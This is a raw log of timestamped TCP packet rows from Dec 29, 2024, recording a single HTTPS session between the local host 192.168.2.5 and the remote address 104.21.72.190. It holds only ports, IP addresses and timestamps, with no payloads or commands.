Dec 29, 2024 09:23:25.121834993 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.121864080 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.121915102 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.121965885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.121987104 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.122112989 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.127237082 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.127253056 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.127321959 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.127347946 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.127407074 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.132112980 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.132132053 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.132178068 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.132195950 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.132220030 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.132245064 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.168431997 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.168462038 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.168513060 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.168554068 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.168570995 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.168601036 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.172662973 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.172678947 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.172734022 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.172756910 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.172832966 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.178030968 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.178049088 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.178092957 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.178113937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.178141117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.178215027 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.183460951 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.183476925 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.183533907 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.183561087 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.183610916 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.231455088 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.231475115 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.231539965 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.231570959 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.231664896 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.323231936 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.323278904 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.323335886 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.323367119 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.323385954 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.323558092 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.328674078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.328691959 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.328748941 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.328756094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.328783035 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.328804970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.333431005 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.333452940 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.333489895 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.333497047 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.333527088 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.333543062 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.370042086 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.370073080 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.370121956 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.370152950 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.370168924 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.370212078 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.374222040 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.374248981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.374289989 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.374305964 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.374331951 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.374347925 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.379717112 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.379739046 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.379808903 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.379822969 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.379864931 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.385020971 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.385045052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.385106087 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.385118961 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.385173082 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.433146000 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.433176041 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.433217049 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.433244944 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.433270931 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.433320999 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.524734020 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.524755955 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.524835110 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.524862051 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.524909973 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.530040026 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.530055046 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.530102968 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.530112028 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.530149937 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.534858942 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.534874916 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.534934998 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.534941912 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.535130978 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.571058989 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.571079016 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.571130037 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.571150064 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.571162939 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.571178913 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.575874090 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.575887918 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.576037884 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.576062918 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.576242924 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.581712961 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.581732988 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.581798077 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.581805944 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.581861019 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.586347103 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.586363077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.586415052 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.586421013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.586467028 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.634375095 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.634402037 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.634447098 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.634463072 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.634480000 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.634504080 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.725958109 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.725980043 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.726028919 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.726052046 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.726068020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.726130009 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.731249094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.731264114 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.731302023 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.731308937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.731344938 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.731344938 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.736778021 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.736793041 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.736846924 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.736852884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.736908913 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.772653103 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.772669077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.772715092 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.772718906 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.772758007 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.777081013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.777095079 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.777147055 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.777153015 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.777307987 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.782519102 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.782536983 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.782588005 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.782594919 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.782639980 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.787808895 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.787825108 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.787866116 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.787870884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.787909031 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.787925959 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.835838079 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.835865021 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.835918903 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.835941076 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.835958004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.835995913 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.927448988 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.927474976 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.927524090 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.927536964 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.927565098 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.927592993 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.932806969 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.932832003 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.932878971 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.932887077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.932919979 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.932933092 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.938270092 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.938292980 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.938349962 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.938354969 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.938384056 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.938404083 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.973934889 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.973963022 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.974030972 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.974044085 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.974069118 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.974106073 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.978693008 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.978713989 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.978773117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.978780031 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.978902102 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.984126091 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.984144926 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.984222889 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.984222889 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.984229088 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.984318972 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.988956928 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.988975048 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.989098072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:25.989104986 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:25.989195108 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.036854982 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.036886930 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.036976099 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.036992073 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.037018061 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.037065983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.128720045 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.128750086 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.128865004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.128865004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.128880978 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.128932953 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.134015083 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.134041071 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.134107113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.134107113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.134118080 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.134234905 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.139494896 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.139523029 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.139595985 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.139595985 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.139600992 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.139682055 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.175546885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.175578117 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.175678968 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.175678968 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.175736904 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.175884962 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.180233955 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.180252075 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.180311918 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.180322886 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.180388927 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.185703039 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.185720921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.185796022 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.185796022 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.185806990 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.185904980 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.190592051 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.190608025 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.190797091 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.190807104 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.190958977 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.238574982 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.238605976 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.238765001 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.238800049 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.238929033 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.330043077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.330075979 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.330171108 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.330171108 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.330204010 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.330384970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.335505962 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.335530043 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.335572004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.335577011 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.335604906 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.335629940 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.340979099 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.341006041 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.341109991 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.341109991 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.341115952 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.341345072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.377209902 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.377237082 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.377336025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.377336025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.377367020 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.378729105 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.382051945 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.382080078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.382148027 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.382148027 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.382162094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.382617950 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.386887074 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.386915922 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.386957884 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.386967897 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.386989117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.387006044 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.392760992 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.392786026 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.392849922 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.392849922 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.392859936 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.393419981 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.439858913 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.439887047 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.439995050 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.439995050 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.440016031 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.440251112 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.557694912 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.557734013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.557868004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.557868004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.557908058 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.558049917 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.562973022 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.563007116 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.563086987 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.563087940 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.563108921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.565679073 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.567764997 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.567796946 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.567835093 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.567847967 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.567872047 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.567950964 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.607183933 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.607217073 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.607310057 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.607310057 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.607351065 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:26.607621908 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:26.612037897 CET	443	49709	104.21.72.190	192.168.2.5
